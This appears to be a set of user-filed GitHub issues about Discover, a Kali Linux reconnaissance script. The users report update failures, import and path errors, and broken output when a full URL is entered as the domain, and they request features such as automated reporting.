emails.txt
hosts.txt
names.txt
subdomains.txt

Netcraft

Screenshot and scrape text from screen.

Download link needs to be updated

Current download:

  • git clone git://github.com/leebaird/backtrack-scripts.git /opt/scripts/

Suggested download:

  • git clone git://github.com/leebaird/discover.git /opt/scripts/

unable to update

Unable to update; it gets stuck on "sudo apt-get install -y gnumeric" with a connection failure. I tried installing it separately and also tried "sudo apt-get install libgtk-3-dev zlibc zlib1g zlib1g-dev intltool", but it gets stuck on verification.

update.sh fixes?

It looks like bluepot needs to be updated to GitHub, and exploit-db, fern wifi cracker, and joomscan need to be updated in update.sh to validate the install and update with the correct if ... else ... fi statement.

  • Travis

Import Error for theHarvester

Hey Lee,

Great tool, I've loved the functionality and recently updated to the latest version. After the update I get a few errors that appear to be an order of operations thing.

error:

Traceback (most recent call last):
  File "/usr/bin/theHarvester", line 17, in <module>
    from discovery import *

I'm working through some other things and will post them here if I can't figure them out. Thanks again for such a great tool.

SG

Automated version / script?

Hi!
I would like an automated version of the Discover tool: active and passive recon, plus Nikto on the hosts with screenshots, all inside the complete generated report.
Is this possible?
Thanks a lot!
Dvir

Error

Hi, after running a passive domain scan, I receive the following error:

cat: names-tmp: No such file or directory
./discover.sh: line 636: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/hosts.htm: No such file or directory
./discover.sh: line 636: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/hosts.htm: No such file or directory
./discover.sh: line 652: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/emails.htm: No such file or directory
./discover.sh: line 662: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/names.htm: No such file or directory
./discover.sh: line 700: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/subdomains.htm: No such file or directory
./discover.sh: line 759: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/whois-domain.htm: No such file or directory
./discover.sh: line 759: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/whois-domain.htm: No such file or directory
./discover.sh: line 766: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/whois-ip.htm: No such file or directory
./discover.sh: line 766: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/whois-ip.htm: No such file or directory
./discover.sh: line 769: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/names.htm: No such file or directory
./discover.sh: line 770: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/squatting.htm: No such file or directory
./discover.sh: line 771: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/subdomains.htm: No such file or directory
./discover.sh: line 773: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/passive-recon.htm: No such file or directory
./discover.sh: line 773: /root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/data/passive-recon.htm: No such file or directory
/root/data/https://www.sweetstreet.com/store/buy-cupcakes-online.html/images/robtex.png: No such file or directory

Add list of tools

It would be nice if you added a complete list of the tools you use in the script. Sure, you can use the "kali-linux-full" metapackage for creating a Docker image, for example, but it is far more efficient to use only the appropriate tools and packages.

Person searching

When I tested using non-English parameters, such as my name, Discover doesn't work properly.

No such file or directory

Hi,
When I try to perform the update function in the menu ("15. Update"), I get the error "./discover.sh: line 3986: /update.sh: No such file or directory".
I discovered that, in the discover.sh file, the command on line 31 does not get the correct path of the file, and the $discover variable is empty.
After I added the command "updatedb" before line 31, it runs correctly.
I am using Kali 2016.1 - Kali Rolling.
